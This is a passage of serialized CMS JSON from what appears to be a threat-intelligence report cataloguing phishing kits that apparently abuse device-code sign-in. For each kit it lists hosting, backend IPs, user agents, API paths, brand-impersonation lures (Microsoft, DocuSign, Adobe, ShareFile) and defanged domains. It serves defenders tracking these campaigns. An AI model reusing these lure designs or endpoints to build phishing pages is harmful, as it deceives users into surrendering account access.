too).",[],{},{"nodeType":312,"data":9705,"content":9709},{"target":9706},{"sys":9707},{"id":9708,"type":317,"linkType":318},"73rNOIEDPfP5IJwpFaxVc2",[],{"nodeType":312,"data":9711,"content":9715},{"target":9712},{"sys":9713},{"id":9714,"type":317,"linkType":318},"5BJSvOQUW9UpsQtoDNtgTC",[],{"nodeType":312,"data":9717,"content":9721},{"target":9718},{"sys":9719},{"id":9720,"type":317,"linkType":318},"3dbePPxVb4h4SauGg3glIL",[],{"nodeType":312,"data":9723,"content":9727},{"target":9724},{"sys":9725},{"id":9726,"type":317,"linkType":318},"1UOLcmNQvOsL5tdLSVuviq",[],{"nodeType":312,"data":9729,"content":9733},{"target":9730},{"sys":9731},{"id":9732,"type":317,"linkType":318},"55XRqLSwUUi2D4ZVpJboml",[],{"nodeType":312,"data":9735,"content":9739},{"target":9736},{"sys":9737},{"id":9738,"type":317,"linkType":318},"5wg5yr2Lo8t3f72ZV815c",[],{"nodeType":312,"data":9741,"content":9745},{"target":9742},{"sys":9743},{"id":9744,"type":317,"linkType":318},"35cowlL6i3rkGXOGmSxlI1",[],{"nodeType":178,"data":9747,"content":9748},{},[9749],{"nodeType":173,"value":37,"marks":9750,"data":9751},[],{},{"nodeType":1653,"data":9753,"content":9754},{},[9755,9779,9862,9914,9938],{"nodeType":1657,"data":9756,"content":9757},{},[9758,9769],{"nodeType":1687,"data":9759,"content":9760},{},[9761],{"nodeType":178,"data":9762,"content":9763},{},[9764],{"nodeType":173,"value":9765,"marks":9766,"data":9768},"Frontend infrastructure",[9767],{"type":370},{},{"nodeType":1687,"data":9770,"content":9771},{},[9772],{"nodeType":178,"data":9773,"content":9774},{},[9775],{"nodeType":173,"value":9776,"marks":9777,"data":9778},"Workers.dev, vercel.app, github.io, fastly.net, edgeone.dev",[],{},{"nodeType":1657,"data":9780,"content":9781},{},[9782,9793],{"nodeType":1687,"data":9783,"content":9784},{},[9785],{"nodeType":178,"data":9786,"content":9787},{},[9788],{"nodeType":173,"value":9789,"marks":9790,"data":9792},"Backend infrastructure",[9791],{"type":370},{},{"nodeType":1687,"data":9794,"content":9795},{},[9796,9826],{"nodeType":178,"data":9797,"content":9798},{},[9799,9804,9808,9813,9817,9822],{"nodeType":173,"value":9800,"marks":9801,"data":9803},"Example IP: (V3) ",[9802],{"type":370},{},{"nodeType":173,"value":9805,"marks":9806,"data":9807},"162.220.232.71 (Railway AS400940) ",[],{},{"nodeType":173,"value":9809,"marks":9810,"data":9812},"(V2)",[9811],{"type":370},{},{"nodeType":173,"value":9814,"marks":9815,"data":9816}," 71.11.42.193 ",[],{},{"nodeType":173,"value":9818,"marks":9819,"data":9821},"(V1) ",[9820],{"type":370},{},{"nodeType":173,"value":9823,"marks":9824,"data":9825},"72.218.25.107",[],{},{"nodeType":178,"data":9827,"content":9828},{},[9829,9834,9837,9842,9846,9850,9854,9858],{"nodeType":173,"value":9830,"marks":9831,"data":9833},"Backend User Agent:",[9832],{"type":370},{},{"nodeType":173,"value":3107,"marks":9835,"data":9836},[],{},{"nodeType":173,"value":9838,"marks":9839,"data":9841},"(V3) ",[9840],{"type":370},{},{"nodeType":173,"value":9843,"marks":9844,"data":9845},"node, ",[],{},{"nodeType":173,"value":9809,"marks":9847,"data":9849},[9848],{"type":370},{},{"nodeType":173,"value":9851,"marks":9852,"data":9853},", Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683 Safari/537.36 OPR/57.0.3098.91 ",[],{},{"nodeType":173,"value":9818,"marks":9855,"data":9857},[9856],{"type":370},{},{"nodeType":173,"value":9859,"marks":9860,"data":9861},"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 OPR/56.0.3051.52 ",[],{},{"nodeType":1657,"data":9863,"content":9864},{},[9865,9876],{"nodeType":1687,"data":9866,"content":9867},{},[9868],{"nodeType":178,"data":9869,"content":9870},{},[9871],{"nodeType":173,"value":9872,"marks":9873,"data":9875},"Network paths",[9874],{"type":370},{},{"nodeType":1687,"data":9877,"content":9878},{},[9879,9886,9893,9900,9907],{"nodeType":178,"data":9880,"content":9881},{},[9882],{"nodeType":173,"value":9883,"marks":9884,"data":9885},"/api/rate-limit ",[],{},{"nodeType":178,"data":9887,"content":9888},{},[9889],{"nodeType":173,"value":9890,"marks":9891,"data":9892},"/api/fingerprint ",[],{},{"nodeType":178,"data":9894,"content":9895},{},[9896],{"nodeType":173,"value":9897,"marks":9898,"data":9899},"/api/captcha-verify ",[],{},{"nodeType":178,"data":9901,"content":9902},{},[9903],{"nodeType":173,"value":9904,"marks":9905,"data":9906},"/api/init /api/generate-code ",[],{},{"nodeType":178,"data":9908,"content":9909},{},[9910],{"nodeType":173,"value":9911,"marks":9912,"data":9913},"/api/check-auth",[],{},{"nodeType":1657,"data":9915,"content":9916},{},[9917,9928],{"nodeType":1687,"data":9918,"content":9919},{},[9920],{"nodeType":178,"data":9921,"content":9922},{},[9923],{"nodeType":173,"value":9924,"marks":9925,"data":9927},"Lure themes",[9926],{"type":370},{},{"nodeType":1687,"data":9929,"content":9930},{},[9931],{"nodeType":178,"data":9932,"content":9933},{},[9934],{"nodeType":173,"value":9935,"marks":9936,"data":9937},"Various MS lures (e.g. Outlook, SharePoint, Teams) DocuSign, Adobe",[],{},{"nodeType":1657,"data":9939,"content":9940},{},[9941,9952],{"nodeType":1687,"data":9942,"content":9943},{},[9944],{"nodeType":178,"data":9945,"content":9946},{},[9947],{"nodeType":173,"value":9948,"marks":9949,"data":9951},"Example Domain",[9950],{"type":370},{},{"nodeType":1687,"data":9953,"content":9954},{},[9955,9967,9979,9991,10003],{"nodeType":178,"data":9956,"content":9957},{},[9958,9963],{"nodeType":173,"value":9959,"marks":9960,"data":9962},"Precursor A:",[9961],{"type":370},{},{"nodeType":173,"value":9964,"marks":9965,"data":9966}," teams-zpfvwnpxuc[.]edgeone.dev",[],{},{"nodeType":178,"data":9968,"content":9969},{},[9970,9975],{"nodeType":173,"value":9971,"marks":9972,"data":9974},"Precursor B: ",[9973],{"type":370},{},{"nodeType":173,"value":9976,"marks":9977,"data":9978},"authenticate-m365-accountsecurity-m-pi[.]vercel.app",[],{},{"nodeType":178,"data":9980,"content":9981},{},[9982,9987],{"nodeType":173,"value":9983,"marks":9984,"data":9986},"Courts Access: ",[9985],{"type":370},{},{"nodeType":173,"value":9988,"marks":9989,"data":9990},"secure-systems-validations-courts[.]vercel.app",[],{},{"nodeType":178,"data":9992,"content":9993},{},[9994,9999],{"nodeType":173,"value":9995,"marks":9996,"data":9998},"Early ANTIBOT:",[9997],{"type":370},{},{"nodeType":173,"value":10000,"marks":10001,"data":10002}," interface-auth-en-useast[.]global.ssl.fastly.net",[],{},{"nodeType":178,"data":10004,"content":10005},{},[10006,10011],{"nodeType":173,"value":10007,"marks":10008,"data":10010},"Production ANTIBOT: ",[10009],{"type":370},{},{"nodeType":173,"value":10012,"marks":10013,"data":10014},"index-z059-document-pending-reviewsign-xlss7994824[.]awalizer[.]workers.dev",[],{},{"nodeType":231,"data":10016,"content":10017},{},[],{"nodeType":235,"data":10019,"content":10020},{},[10021],{"nodeType":173,"value":10022,"marks":10023,"data":10025},"“SHAREFILE”",[10024],{"type":370},{},{"nodeType":1653,"data":10027,"content":10028},{},[10029,10052,10091,10114,10137],{"nodeType":1657,"data":10030,"content":10031},{},[10032,10042],{"nodeType":1687,"data":10033,"content":10034},{},[10035],{"nodeType":178,"data":10036,"content":10037},{},[10038],{"nodeType":173,"value":9765,"marks":10039,"data":10041},[10040],{"type":370},{},{"nodeType":1687,"data":10043,"content":10044},{},[10045],{"nodeType":178,"data":10046,"content":10047},{},[10048],{"nodeType":173,"value":10049,"marks":10050,"data":10051},"No hosting markers visible.",[],{},{"nodeType":1657,"data":10053,"content":10054},{},[10055,10065],{"nodeType":1687,"data":10056,"content":10057},{},[10058],{"nodeType":178,"data":10059,"content":10060},{},[10061],{"nodeType":173,"value":9789,"marks":10062,"data":10064},[10063],{"type":370},{},{"nodeType":1687,"data":10066,"content":10067},{},[10068,10080],{"nodeType":178,"data":10069,"content":10070},{},[10071,10076],{"nodeType":173,"value":10072,"marks":10073,"data":10075},"Example IP:",[10074],{"type":370},{},{"nodeType":173,"value":10077,"marks":10078,"data":10079}," 147.45.60.47 (Global Connectivity Solutions LLP AS215540)",[],{},{"nodeType":178,"data":10081,"content":10082},{},[10083,10087],{"nodeType":173,"value":9830,"marks":10084,"data":10086},[10085],{"type":370},{},{"nodeType":173,"value":10088,"marks":10089,"data":10090}," node",[],{},{"nodeType":1657,"data":10092,"content":10093},{},[10094,10104],{"nodeType":1687,"data":10095,"content":10096},{},[10097],{"nodeType":178,"data":10098,"content":10099},{},[10100],{"nodeType":173,"value":9872,"marks":10101,"data":10103},[10102],{"type":370},{},{"nodeType":1687,"data":10105,"content":10106},{},[10107],{"nodeType":178,"data":10108,"content":10109},{},[10110],{"nodeType":173,"value":10111,"marks":10112,"data":10113},"POST /api/device/start  POST /api/device/poll",[],{},{"nodeType":1657,"data":10115,"content":10116},{},[10117,10127],{"nodeType":1687,"data":10118,"content":10119},{},[10120],{"nodeType":178,"data":10121,"content":10122},{},[10123],{"nodeType":173,"value":9924,"marks":10124,"data":10126},[10125],{"type":370},{},{"nodeType":1687,"data":10128,"content":10129},{},[10130],{"nodeType":178,"data":10131,"content":10132},{},[10133],{"nodeType":173,"value":10134,"marks":10135,"data":10136},"Citrix ShareFile document transfer — file card with sender info, expiry warning, download/preview buttons",[],{},{"nodeType":1657,"data":10138,"content":10139},{},[10140,10151],{"nodeType":1687,"data":10141,"content":10142},{},[10143],{"nodeType":178,"data":10144,"content":10145},{},[10146],{"nodeType":173,"value":10147,"marks":10148,"data":10150},"Example domain",[10149],{"type":370},{},{"nodeType":1687,"data":10152,"content":10153},{},[10154],{"nodeType":178,"data":10155,"content":10156},{},[10157],{"nodeType":173,"value":10158,"marks":10159,"data":10160},"cghdfg[.]vbchkioi[.]su",[],{},{"nodeType":312,"data":10162,"content":10166},{"target":10163},{"sys":10164},{"id":10165,"type":317,"linkType":318},"1TtZ6VsMSTlPvy7W996w9E",[],{"nodeType":231,"data":10168,"content":10169},{},[],{"nodeType":235,"data":10171,"content":10172},{},[10173],{"nodeType":173,"value":10174,"marks":10175,"data":10177},"“CLURE”",[10176],{"type":370},{},{"nodeType":1653,"data":10179,"content":10180},{},[10181,10204,10243,10266,10289],{"nodeType":1657,"data":10182,"content":10183},{},[10184,10194],{"nodeType":1687,"data":10185,"content":10186},{},[10187],{"nodeType":178,"data":10188,"content":10189},{},[10190],{"nodeType":173,"value":9765,"marks":10191,"data":10193},[10192],{"type":370},{},{"nodeType":1687,"data":10195,"content":10196},{},[10197],{"nodeType":178,"data":10198,"content":10199},{},[10200],{"nodeType":173,"value":10201,"marks":10202,"data":10203},"API on api.duemineral.uk:8443 and api.loadingdocuments.uk:8443 (rotates). ",[],{},{"nodeType":1657,"data":10205,"content":10206},{},[10207,10217],{"nodeType":1687,"data":10208,"content":10209},{},[10210],{"nodeType":178,"data":10211,"content":10212},{},[10213],{"nodeType":173,"value":9789,"marks":10214,"data":10216},[10215],{"type":370},{},{"nodeType":1687,"data":10218,"content":10219},{},[10220,10232],{"nodeType":178,"data":10221,"content":10222},{},[10223,10228],{"nodeType":173,"value":10224,"marks":10225,"data":10227},"Example IP: ",[10226],{"type":370},{},{"nodeType":173,"value":10229,"marks":10230,"data":10231},"162.243.166.119 (DigitalOcean AS14061)",[],{},{"nodeType":178,"data":10233,"content":10234},{},[10235,10239],{"nodeType":173,"value":9830,"marks":10236,"data":10238},[10237],{"type":370},{},{"nodeType":173,"value":10240,"marks":10241,"data":10242}," python-requests/2.32.5",[],{},{"nodeType":1657,"data":10244,"content":10245},{},[10246,10256],{"nodeType":1687,"data":10247,"content":10248},{},[10249],{"nodeType":178,"data":10250,"content":10251},{},[10252],{"nodeType":173,"value":9872,"marks":10253,"data":10255},[10254],{"type":370},{},{"nodeType":1687,"data":10257,"content":10258},{},[10259],{"nodeType":178,"data":10260,"content":10261},{},[10262],{"nodeType":173,"value":10263,"marks":10264,"data":10265},"GET /api/status/{numeric_SID} (port :8443)",[],{},{"nodeType":1657,"data":10267,"content":10268},{},[10269,10279],{"nodeType":1687,"data":10270,"content":10271},{},[10272],{"nodeType":178,"data":10273,"content":10274},{},[10275],{"nodeType":173,"value":9924,"marks":10276,"data":10278},[10277],{"type":370},{},{"nodeType":1687,"data":10280,"content":10281},{},[10282],{"nodeType":178,"data":10283,"content":10284},{},[10285],{"nodeType":173,"value":10286,"marks":10287,"data":10288},"SharePoint \"Team Site\" doc library, SharePoint \"Shared Document\" individual share",[],{},{"nodeType":1657,"data":10290,"content":10291},{},[10292,10302],{"nodeType":1687,"data":10293,"content":10294},{},[10295],{"nodeType":178,"data":10296,"content":10297},{},[10298],{"nodeType":173,"value":10147,"marks":10299,"data":10301},[10300],{"type":370},{},{"nodeType":1687,"data":10303,"content":10304},{},[10305],{"nodeType":178,"data":10306,"content":10307},{},[10308],{"nodeType":173,"value":10309,"marks":10310,"data":10311},"auth[.]duemineral[.]uk",[],{},{"nodeType":312,"data":10313,"content":10317},{"target":10314},{"sys":10315},{"id":10316,"type":317,"linkType":318},"3DAm11OYudNrqbL6pda5S1",[],{"nodeType":231,"data":10319,"content":10320},{},[],{"nodeType":235,"data":10322,"content":10323},{},[10324],{"nodeType":173,"value":10325,"marks":10326,"data":10328},"“LINKID”",[10327],{"type":370},{},{"nodeType":1653,"data":10330,"content":10331},{},[10332,10355,10400,10430,10453],{"nodeType":1657,"data":10333,"content":10334},{},[10335,10345],{"nodeType":1687,"data":10336,"content":10337},{},[10338],{"nodeType":178,"data":10339,"content":10340},{},[10341],{"nodeType":173,"value":9765,"marks":10342,"data":10344},[10343],{"type":370},{},{"nodeType":1687,"data":10346,"content":10347},{},[10348],{"nodeType":178,"data":10349,"content":10350},{},[10351],{"nodeType":173,"value":10352,"marks":10353,"data":10354},"Adobe variant has Cloudflare challenge-platform iframe (CF-protected origin). Relative API paths — self-hosted.",[],{},{"nodeType":1657,"data":10356,"content":10357},{},[10358,10368],{"nodeType":1687,"data":10359,"content":10360},{},[10361],{"nodeType":178,"data":10362,"content":10363},{},[10364],{"nodeType":173,"value":9789,"marks":10365,"data":10367},[10366],{"type":370},{},{"nodeType":1687,"data":10369,"content":10370},{},[10371,10382,10389],{"nodeType":178,"data":10372,"content":10373},{},[10374,10378],{"nodeType":173,"value":10224,"marks":10375,"data":10377},[10376],{"type":370},{},{"nodeType":173,"value":10379,"marks":10380,"data":10381},"185.176.220.22 (2cloud.eu AS39845)",[],{},{"nodeType":178,"data":10383,"content":10384},{},[10385],{"nodeType":173,"value":10386,"marks":10387,"data":10388},"2600:1f10:470d:9a00:1437:ec30:be61:3494 (AWS AS16509)",[],{},{"nodeType":178,"data":10390,"content":10391},{},[10392,10396],{"nodeType":173,"value":9830,"marks":10393,"data":10395},[10394],{"type":370},{},{"nodeType":173,"value":10397,"marks":10398,"data":10399}," axios/1.10.0 , axios/1.13.6",[],{},{"nodeType":1657,"data":10401,"content":10402},{},[10403,10413],{"nodeType":1687,"data":10404,"content":10405},{},[10406],{"nodeType":178,"data":10407,"content":10408},{},[10409],{"nodeType":173,"value":9872,"marks":10410,"data":10412},[10411],{"type":370},{},{"nodeType":1687,"data":10414,"content":10415},{},[10416,10423],{"nodeType":178,"data":10417,"content":10418},{},[10419],{"nodeType":173,"value":10420,"marks":10421,"data":10422},"POST /api/device/start",[],{},{"nodeType":178,"data":10424,"content":10425},{},[10426],{"nodeType":173,"value":10427,"marks":10428,"data":10429},"GET /api/device/status/{sessionId}",[],{},{"nodeType":1657,"data":10431,"content":10432},{},[10433,10443],{"nodeType":1687,"data":10434,"content":10435},{},[10436],{"nodeType":178,"data":10437,"content":10438},{},[10439],{"nodeType":173,"value":9924,"marks":10440,"data":10442},[10441],{"type":370},{},{"nodeType":1687,"data":10444,"content":10445},{},[10446],{"nodeType":178,"data":10447,"content":10448},{},[10449],{"nodeType":173,"value":10450,"marks":10451,"data":10452},"MS Teams meeting invitation (with interactive date/time picker), Adobe Acrobat Sign document review",[],{},{"nodeType":1657,"data":10454,"content":10455},{},[10456,10466],{"nodeType":1687,"data":10457,"content":10458},{},[10459],{"nodeType":178,"data":10460,"content":10461},{},[10462],{"nodeType":173,"value":10147,"marks":10463,"data":10465},[10464],{"type":370},{},{"nodeType":1687,"data":10467,"content":10468},{},[10469],{"nodeType":178,"data":10470,"content":10471},{},[10472],{"nodeType":173,"value":10473,"marks":10474,"data":10475},"sdtr-site[.]cfd",[],{},{"nodeType":312,"data":10477,"content":10481},{"target":10478},{"sys":10479},{"id":10480,"type":317,"linkType":318},"22hsIzlkptC2JTIUtbOuUn",[],{"nodeType":231,"data":10483,"content":10484},{},[],{"nodeType":235,"data":10486,"content":10487},{},[10488],{"nodeType":173,"value":10489,"marks":10490,"data":10492},"“AUTHOV”",[10491],{"type":370},{},{"nodeType":1653,"data":10494,"content":10495},{},[10496,10519,10565,10588,10611],{"nodeType":1657,"data":10497,"content":10498},{},[10499,10509],{"nodeType":1687,"data":10500,"content":10501},{},[10502],{"nodeType":178,"data":10503,"content":10504},{},[10505],{"nodeType":173,"value":9765,"marks":10506,"data":10508},[10507],{"type":370},{},{"nodeType":1687,"data":10510,"content":10511},{},[10512],{"nodeType":178,"data":10513,"content":10514},{},[10515],{"nodeType":173,"value":10516,"marks":10517,"data":10518},"workers.dev",[],{},{"nodeType":1657,"data":10520,"content":10521},{},[10522,10532],{"nodeType":1687,"data":10523,"content":10524},{},[10525],{"nodeType":178,"data":10526,"content":10527},{},[10528],{"nodeType":173,"value":9789,"marks":10529,"data":10531},[10530],{"type":370},{},{"nodeType":1687,"data":10533,"content":10534},{},[10535,10546],{"nodeType":178,"data":10536,"content":10537},{},[10538,10542],{"nodeType":173,"value":10224,"marks":10539,"data":10541},[10540],{"type":370},{},{"nodeType":173,"value":10543,"marks":10544,"data":10545},"192.3.225.100 (HostPapa / ColoCrossing AS36352)",[],{},{"nodeType":178,"data":10547,"content":10548},{},[10549,10553,10556,10561],{"nodeType":173,"value":9830,"marks":10550,"data":10552},[10551],{"type":370},{},{"nodeType":173,"value":3107,"marks":10554,"data":10555},[],{},{"nodeType":173,"value":10557,"marks":10558,"data":10560}," ",[10559],{"type":370},{},{"nodeType":173,"value":10562,"marks":10563,"data":10564},"python-httpx/0.28.1",[],{},{"nodeType":1657,"data":10566,"content":10567},{},[10568,10578],{"nodeType":1687,"data":10569,"content":10570},{},[10571],{"nodeType":178,"data":10572,"content":10573},{},[10574],{"nodeType":173,"value":9872,"marks":10575,"data":10577},[10576],{"type":370},{},{"nodeType":1687,"data":10579,"content":10580},{},[10581],{"nodeType":178,"data":10582,"content":10583},{},[10584],{"nodeType":173,"value":10585,"marks":10586,"data":10587},"GET /landing/api/session-status?session_id=&token=",[],{},{"nodeType":1657,"data":10589,"content":10590},{},[10591,10601],{"nodeType":1687,"data":10592,"content":10593},{},[10594],{"nodeType":178,"data":10595,"content":10596},{},[10597],{"nodeType":173,"value":9924,"marks":10598,"data":10600},[10599],{"type":370},{},{"nodeType":1687,"data":10602,"content":10603},{},[10604],{"nodeType":178,"data":10605,"content":10606},{},[10607],{"nodeType":173,"value":10608,"marks":10609,"data":10610},"Adobe Acrobat document sharing (PDF preview, sender avatar)",[],{},{"nodeType":1657,"data":10612,"content":10613},{},[10614,10624],{"nodeType":1687,"data":10615,"content":10616},{},[10617],{"nodeType":178,"data":10618,"content":10619},{},[10620],{"nodeType":173,"value":10147,"marks":10621,"data":10623},[10622],{"type":370},{},{"nodeType":1687,"data":10625,"content":10626},{},[10627],{"nodeType":178,"data":10628,"content":10629},{},[10630],{"nodeType":173,"value":10631,"marks":10632,"data":10633},"milosh-solibella-0dcio[.]sgttommy.workers.dev",[],{},{"nodeType":312,"data":10635,"content":10639},{"target":10636},{"sys":10637},{"id":10638,"type":317,"linkType":318},"6szO6IKJ32usyxIKX1efZy",[],{"nodeType":231,"data":10641,"content":10642},{},[],{"nodeType":235,"data":10644,"content":10645},{},[10646],{"nodeType":173,"value":10647,"marks":10648,"data":10650},"“DOCUPOLL”",[10649],{"type":370},{},{"nodeType":1653,"data":10652,"content":10653},{},[10654,10677,10715,10752,10775],{"nodeType":1657,"data":10655,"content":10656},{},[10657,10667],{"nodeType":1687,"data":10658,"content":10659},{},[10660],{"nodeType":178,"data":10661,"content":10662},{},[10663],{"nodeType":173,"value":9765,"marks":10664,"data":10666},[10665],{"type":370},{},{"nodeType":1687,"data":10668,"content":10669},{},[10670],{"nodeType":178,"data":10671,"content":10672},{},[10673],{"nodeType":173,"value":10674,"marks":10675,"data":10676},"Github.io and workers.dev hosting",[],{},{"nodeType":1657,"data":10678,"content":10679},{},[10680,10690],{"nodeType":1687,"data":10681,"content":10682},{},[10683],{"nodeType":178,"data":10684,"content":10685},{},[10686],{"nodeType":173,"value":9789,"marks":10687,"data":10689},[10688],{"type":370},{},{"nodeType":1687,"data":10691,"content":10692},{},[10693,10704],{"nodeType":178,"data":10694,"content":10695},{},[10696,10700],{"nodeType":173,"value":10224,"marks":10697,"data":10699},[10698],{"type":370},{},{"nodeType":173,"value":10701,"marks":10702,"data":10703},"144.172.103.240 (FranTech Solutions / RouterHosting / Cloudzy AS14956)",[],{},{"nodeType":178,"data":10705,"content":10706},{},[10707,10711],{"nodeType":173,"value":9830,"marks":10708,"data":10710},[10709],{"type":370},{},{"nodeType":173,"value":10712,"marks":10713,"data":10714}," Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19042",[],{},{"nodeType":1657,"data":10716,"content":10717},{},[10718,10728],{"nodeType":1687,"data":10719,"content":10720},{},[10721],{"nodeType":178,"data":10722,"content":10723},{},[10724],{"nodeType":173,"value":9872,"marks":10725,"data":10727},[10726],{"type":370},{},{"nodeType":1687,"data":10729,"content":10730},{},[10731,10738,10745],{"nodeType":178,"data":10732,"content":10733},{},[10734],{"nodeType":173,"value":10735,"marks":10736,"data":10737},"POST /api/v1/landing-pages/public/{slug}/init",[],{},{"nodeType":178,"data":10739,"content":10740},{},[10741],{"nodeType":173,"value":10742,"marks":10743,"data":10744},"POST .../poll",[],{},{"nodeType":178,"data":10746,"content":10747},{},[10748],{"nodeType":173,"value":10749,"marks":10750,"data":10751},"POST .../track",[],{},{"nodeType":1657,"data":10753,"content":10754},{},[10755,10765],{"nodeType":1687,"data":10756,"content":10757},{},[10758],{"nodeType":178,"data":10759,"content":10760},{},[10761],{"nodeType":173,"value":9924,"marks":10762,"data":10764},[10763],{"type":370},{},{"nodeType":1687,"data":10766,"content":10767},{},[10768],{"nodeType":178,"data":10769,"content":10770},{},[10771],{"nodeType":173,"value":10772,"marks":10773,"data":10774},"DocuSign document signing. One sample is a full scrape of real docusign.com (free-account page) with kit injected.",[],{},{"nodeType":1657,"data":10776,"content":10777},{},[10778,10788],{"nodeType":1687,"data":10779,"content":10780},{},[10781],{"nodeType":178,"data":10782,"content":10783},{},[10784],{"nodeType":173,"value":10147,"marks":10785,"data":10787},[10786],{"type":370},{},{"nodeType":1687,"data":10789,"content":10790},{},[10791],{"nodeType":178,"data":10792,"content":10793},{},[10794],{"nodeType":173,"value":10795,"marks":10796,"data":10797},"docufirmar[.]github.io",[],{},{"nodeType":312,"data":10799,"content":10803},{"target":10800},{"sys":10801},{"id":10802,"type":317,"linkType":318},"6Y1XABHnQD82R3MW80HnQZ",[],{"nodeType":231,"data":10805,"content":10806},{},[],{"nodeType":235,"data":10808,"content":10809},{},[10810],{"nodeType":173,"value":10811,"marks":10812,"data":10814},"“FLOW_TOKEN”",[10813],{"type":370},{},{"nodeType":1653,"data":10816,"content":10817},{},[10818,10840,10885,10915,10938],{"nodeType":1657,"data":10819,"content":10820},{},[10821,10831],{"nodeType":1687,"data":10822,"content":10823},{},[10824],{"nodeType":178,"data":10825,"content":10826},{},[10827],{"nodeType":173,"value":9765,"marks":10828,"data":10830},[10829],{"type":370},{},{"nodeType":1687,"data":10832,"content":10833},{},[10834],{"nodeType":178,"data":10835,"content":10836},{},[10837],{"nodeType":173,"value":10516,"marks":10838,"data":10839},[],{},{"nodeType":1657,"data":10841,"content":10842},{},[10843,10853],{"nodeType":1687,"data":10844,"content":10845},{},[10846],{"nodeType":178,"data":10847,"content":10848},{},[10849],{"nodeType":173,"value":9789,"marks":10850,"data":10852},[10851],{"type":370},{},{"nodeType":1687,"data":10854,"content":10855},{},[10856,10867],{"nodeType":178,"data":10857,"content":10858},{},[10859,10863],{"nodeType":173,"value":10224,"marks":10860,"data":10862},[10861],{"type":370},{},{"nodeType":173,"value":10864,"marks":10865,"data":10866},"43.166.163.163 (Tencent Cloud AS132203)",[],{},{"nodeType":178,"data":10868,"content":10869},{},[10870,10874,10877,10881],{"nodeType":173,"value":9830,"marks":10871,"data":10873},[10872],{"type":370},{},{"nodeType":173,"value":3107,"marks":10875,"data":10876},[],{},{"nodeType":173,"value":10557,"marks":10878,"data":10880},[10879],{"type":370},{},{"nodeType":173,"value":10882,"marks":10883,"data":10884},"(null)",[],{},{"nodeType":1657,"data":10886,"content":10887},{},[10888,10898],{"nodeType":1687,"data":10889,"content":10890},{},[10891],{"nodeType":178,"data":10892,"content":10893},{},[10894],{"nodeType":173,"value":9872,"marks":10895,"data":10897},[10896],{"type":370},{},{"nodeType":1687,"data":10899,"content":10900},{},[10901,10908],{"nodeType":178,"data":10902,"content":10903},{},[10904],{"nodeType":173,"value":10905,"marks":10906,"data":10907},"POST /api/handler.php ",[],{},{"nodeType":178,"data":10909,"content":10910},{},[10911],{"nodeType":173,"value":10912,"marks":10913,"data":10914},"(actions: device_code_generate, device_code_poll_public)",[],{},{"nodeType":1657,"data":10916,"content":10917},{},[10918,10928],{"nodeType":1687,"data":10919,"content":10920},{},[10921],{"nodeType":178,"data":10922,"content":10923},{},[10924],{"nodeType":173,"value":9924,"marks":10925,"data":10927},[10926],{"type":370},{},{"nodeType":1687,"data":10929,"content":10930},{},[10931],{"nodeType":178,"data":10932,"content":10933},{},[10934],{"nodeType":173,"value":10935,"marks":10936,"data":10937},"DocuSign \"Salary Adjustment Document — 2026\", Microsoft banner · HR Department sender",[],{},{"nodeType":1657,"data":10939,"content":10940},{},[10941,10951],{"nodeType":1687,"data":10942,"content":10943},{},[10944],{"nodeType":178,"data":10945,"content":10946},{},[10947],{"nodeType":173,"value":10147,"marks":10948,"data":10950},[10949],{"type":370},{},{"nodeType":1687,"data":10952,"content":10953},{},[10954],{"nodeType":178,"data":10955,"content":10956},{},[10957],{"nodeType":173,"value":10958,"marks":10959,"data":10960},"salaryadjustment-2afb52.pmb6fefc52b3f9aa5c2dbf[.]workers.dev",[],{},{"nodeType":312,"data":10962,"content":10966},{"target":10963},{"sys":10964},{"id":10965,"type":317,"linkType":318},"6xiTDHStbiJh7LMhjAZcPd",[],{"nodeType":231,"data":10968,"content":10969},{},[],{"nodeType":235,"data":10971,"content":10972},{},[10973],{"nodeType":173,"value":10974,"marks":10975,"data":10977},"“PAPRIKA”",[10976],{"type":370},{},{"nodeType":1653,"data":10979,"content":10980},{},[10981,11004,11027,11050],{"nodeType":1657,"data":10982,"content":10983},{},[10984,10994],{"nodeType":1687,"data":10985,"content":10986},{},[10987],{"nodeType":178,"data":10988,"content":10989},{},[10990],{"nodeType":173,"value":9765,"marks":10991,"data":10993},[10992],{"type":370},{},{"nodeType":1687,"data":10995,"content":10996},{},[10997],{"nodeType":178,"data":10998,"content":10999},{},[11000],{"nodeType":173,"value":11001,"marks":11002,"data":11003},"AWS S3 hosting",[],{},{"nodeType":1657,"data":11005,"content":11006},{},[11007,11017],{"nodeType":1687,"data":11008,"content":11009},{},[11010],{"nodeType":178,"data":11011,"content":11012},{},[11013],{"nodeType":173,"value":9872,"marks":11014,"data":11016},[11015],{"type":370},{},{"nodeType":1687,"data":11018,"content":11019},{},[11020],{"nodeType":178,"data":11021,"content":11022},{},[11023],{"nodeType":173,"value":11024,"marks":11025,"data":11026},"POST /api/v1/loader",[],{},{"nodeType":1657,"data":11028,"content":11029},{},[11030,11040],{"nodeType":1687,"data":11031,"content":11032},{},[11033],{"nodeType":178,"data":11034,"content":11035},{},[11036],{"nodeType":173,"value":9924,"marks":11037,"data":11039},[11038],{"type":370},{},{"nodeType":1687,"data":11041,"content":11042},{},[11043],{"nodeType":178,"data":11044,"content":11045},{},[11046],{"nodeType":173,"value":11047,"marks":11048,"data":11049},"MS login clone (\"Sign in to your account\"), \"Office 365\" branding, fake \"Powered by Okta\" 